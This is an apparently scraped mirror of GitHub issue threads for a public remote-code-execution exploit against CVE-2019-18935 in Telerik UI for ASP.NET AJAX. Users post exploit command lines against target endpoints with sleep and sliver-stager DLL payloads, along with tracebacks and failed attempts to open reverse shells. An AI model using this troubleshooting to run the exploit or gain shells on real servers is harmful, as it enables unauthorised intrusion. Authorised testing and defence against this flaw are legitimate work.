noperator / cve-2019-18935 Goto Github PK
View Code? Open in Web Editor NEWRCE exploit for a .NET JSON deserialization vulnerability in Telerik UI for ASP.NET AJAX.
License: Apache License 2.0
RCE exploit for a .NET JSON deserialization vulnerability in Telerik UI for ASP.NET AJAX.
License: Apache License 2.0
Line 17 in 785c19b
Traceback (most recent call last): File "C:\Users\hi\Desktop\CVE-2019-18935\CVE-2019-18935.py", line 202, in <module> filename_remote_actual = upload( File "C:\Users\hi\Desktop\CVE-2019-18935\CVE-2019-18935.py", line 121, in upload if filename_remote != result['metaData']['TempFileName']: TypeError: 'NoneType' object is not subscriptable
I have managed to compile the payload, and have shortlisted the version of Telerik to be 2019.1.215 (based on the last modified date on /WebResource). What could be the possible reason for this error?
The command I ran was python .\CVE-2019-18935.py -v 2019.1.215 -u HOSTNAME/Telerik.Web.UI.WebResource.axd?type=rau -p .\payloads\sleep-2020122117174156-amd64.dll -f 'C:\Windows\Temp'
HI, I try all of code for several days but even stager also does not work ,i install sliver in kali but sliver-stager code also doesn't work , I enable debug in sliver-stage code and set 1 ,but it doesn't show any error and also sleep doesn't increase response time
I test these
python3 CVE-2019-18935.py -v 2013.2.717.40 -p sleep-05202102280267-amd64.dll -u http://xxx/Telerik.Web.UI.WebResource.axd?type=rau
python3 CVE-2019-18935.py -v 2017 -u http://xxx/Telerik.Web.UI.WebResource.axd?type=rau -p sliver-stager-05202117080198-x86.dll and reverse shell
please help
Whenever i'm trying to get a rev shell, the connection is closed.
requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
Any suggestions how to resolve the issue ?
thanks for this project. The target server has a telerik vulnerability. The sleep.dll file is executing successfullyf. but when I want to get a reverse shell, the server pings but my netcat listener ends. nc: getnameinfo: Temporary failure in name resolution
Could it be some kind of waf in the background? Or what is the reason for this? Can I use a different payload instead of the reverse_shell.c file? I think maybe I can succeed with the powershell download string method. but please give me an idea how can i do this.
I want to use this vulnerability in one of my tests
The sleep tool works properly But no reverse shell
Where can the problem be?
Do you have a link/instructions where I can download Telerik for ASP.NET Ajax old versions and verify that the exploit works?
[*] Destination folder: C:\Windows\Temp
[*] Remote payload name: 1653504358.1273334.dll
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 387, in _make_request
conn.request(method, url, **httplib_request_kw)
File "/usr/lib/python3.10/http/client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1076, in _send_output
self.send(chunk)
File "/usr/lib/python3.10/http/client.py", line 998, in send
self.sock.sendall(data)
ConnectionResetError: [Errno 104] Connection reset by peer
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 439, in send
resp = conn.urlopen(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 719, in urlopen
retries = retries.increment(
File "/usr/lib/python3/dist-packages/urllib3/util/retry.py", line 400, in increment
raise six.reraise(type(error), error, _stacktrace)
File "/usr/lib/python3/dist-packages/six.py", line 718, in reraise
raise value.with_traceback(tb)
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 665, in urlopen
httplib_response = self._make_request(
File "/usr/lib/python3/dist-packages/urllib3/connectionpool.py", line 387, in _make_request
conn.request(method, url, **httplib_request_kw)
File "/usr/lib/python3.10/http/client.py", line 1282, in request
self._send_request(method, url, body, headers, encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1328, in _send_request
self.endheaders(body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1277, in endheaders
self._send_output(message_body, encode_chunked=encode_chunked)
File "/usr/lib/python3.10/http/client.py", line 1076, in _send_output
self.send(chunk)
File "/usr/lib/python3.10/http/client.py", line 998, in send
self.sock.sendall(data)
urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/root/misctest/RAU_crypto/CVE-2019-18935/CVE-2019-18935.py", line 245, in <module>
filename_remote_actual = upload(
File "/root/misctest/RAU_crypto/CVE-2019-18935/CVE-2019-18935.py", line 125, in upload
result = send_request(url, files)
File "/root/misctest/RAU_crypto/CVE-2019-18935/CVE-2019-18935.py", line 46, in send_request
response = post(url, files=files, headers=headers, verify=False)
File "/usr/lib/python3/dist-packages/requests/api.py", line 116, in post
return request('post', url, data=data, json=json, **kwargs)
File "/usr/lib/python3/dist-packages/requests/api.py", line 60, in request
return session.request(method=method, url=url, **kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 533, in request
resp = self.send(prep, **send_kwargs)
File "/usr/lib/python3/dist-packages/requests/sessions.py", line 646, in send
r = adapter.send(request, **kwargs)
File "/usr/lib/python3/dist-packages/requests/adapters.py", line 498, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetError(104, 'Connection reset by peer'))
Getting this error while uploading sleep payload, @noperator as i see you have closed #8 issue which didnt have much info.
any wonder whats happening here?
To compile the DLL payload successfully .NET Framework 4.x SDK seems to be required. For example, .NET framework 4.6.1 SDK available at https://www.microsoft.com/en-us/download/details.aspx?id=49978. It would be nice to have this infor in the README.md.
Hello, do you know what this error means?
Validation of viewstate MAC failed. If this application is hosted by a Web Farm or cluster, ensure that <machineKey> configuration specifies the same validationKey and validation algorithm. AutoGenerate cannot be used in a cluster.
See http://go.microsoft.com/fwlink/?LinkID=314055 for more information
This tool works great when you can access 'Telerik.Web.UI.WebResource.axd?type=rau' as an unauthenticated user. But in most of the cases, I have seen that to access 'Telerik.Web.UI.WebResource.axd?type=rau' you need to be authenticated.
How to use this exploit in the authenticated case?
One possibility I can think of is to relay the tool's traffic via burp using the proxy switch. Having a proxy switch would be really helpful in this case. Alternatively, we can also have a switch to provide session cookies to the tool.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.